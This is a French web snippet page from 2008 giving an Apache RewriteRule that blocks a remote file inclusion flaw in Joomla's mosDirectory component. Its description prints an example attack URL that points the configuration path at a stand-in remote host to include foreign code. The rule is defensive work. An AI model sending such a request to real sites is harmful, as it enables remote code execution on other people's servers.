Bouts de Codes

Eviter la faille de sécurité de joomla (mosDirectory)

Information sur le code source

Enregistré le 31 Mai 2008 - Vu 6440 fois
Code source zippé: télécharger le zip
Impression: imprimer le code
  • Sociale bookmarking: Digg ce code sur digg.com
  • Bookmark ce code sur del.icio.us
  • Partage ce code sur Facebook
  • Bookmark ce code sur Google
  • Bookmark ce code sur Yahoo
  • Ajoute Eviter la faille de sécurité de joomla (mosDirectory)
Votre avis: 
 
Ecrit par :  admin
[66] sources en Apache voir
 

Description du code source

Informations sur le code source

Cette faille de sécurité par RFI (remote file include) existe dans le composant mosDirectory de joomla. La vulnérabilité concerne le script mod_pxt_latest.php. Les url concernées sont de la forme :
http://www.example.com/com_directory/modules/mod_pxt_latest.php?
GLOBALS[mosConfig_absolute_path]=http://www.sitepourri.com/page.txt??

Voir également :
» Page d'erreur 403 personnalisée

Code Source



.01
.02
.03
.04
.05
.06
.07
.08
.09
.10
.11
.12
.13
.14
.15
.16
.17
.18
.19
.20
.21
.22
.23
 

################################################################################
#                                                                              #
#                         __                   _ __  _                         #
#               __ ______/ /______ _    ______(_) /_(_)__  ___ _               #
#              / // / __/ / __/ -_) |/|/ / __/ / __/ / _ \/ _ `/               #
#              \_,_/_/ /_/_/  \__/|__,__/_/ /_/\__/_/_//_/\_, /                #
#                                                        /___/                 #
#                                                                              #
#                                                                              #
################################################################################
#                                                                              #
# Titre          : Eviter la faille de sécurité de joomla (mosDirectory)       #
#                                                                              #
# URL            : http://www.urlrewriting.fr/scripts43-Apache.htm             #
# Auteur         : admin                                                       #
# Date édition   : 31 Mai 2008                                                 #
#                                                                              #
################################################################################

RewriteCond %{QUERY_STRING} ^(.*&)?GLOBALS\[mosConfig_absolute_path\]=http://
RewriteRule ^(.*/)?com_directory/modules/mod_pxt_latest.php$ - [F,L]

Ajouter un commentaire

RSS
snippets


RSS
commentaires

 
Code de sécurité

Attention: Les champs marqués d'une étoile * sont obligatoires
Librairie

Langages de programmation

La librairie est ouverte à tous et elle est accès principalement sur les langages Snippets. Vous trouverez aussi d'autres langages de programmation tel que le CSS, HTML, AJAX, ASP.. Plus de 300 références facilement accessibles. Visiter

  • Debian GNU/Linux - Services réseaux (Bind DNS, Apache, NFS, Samba, Messagerie...)
  • LAMP (Linux, Apache, MySQL, PHP) Pack 4 volumes : Maîtrisez vos applications Web en Open Source
  • Précis & Concis : Apache
  • Apache 2.0 : Guide de l'administrateur Linux
  • Guide de référence : Apache 2 : Installation, configuration et administration sous Windows et Linux
  • Apache
  • LAMP (Linux, Apache, MySQL, PHP) - Coffret de 4 livres : Maîtrisez vos applications Web Open Source [Nouvelles versions]
  • Apache (version 2) : Installation, administration et sécurisation
  • Apache Tomcat 5 : Serveur d'application Java ; Administration sous Windows ou Linux
  • Apache en action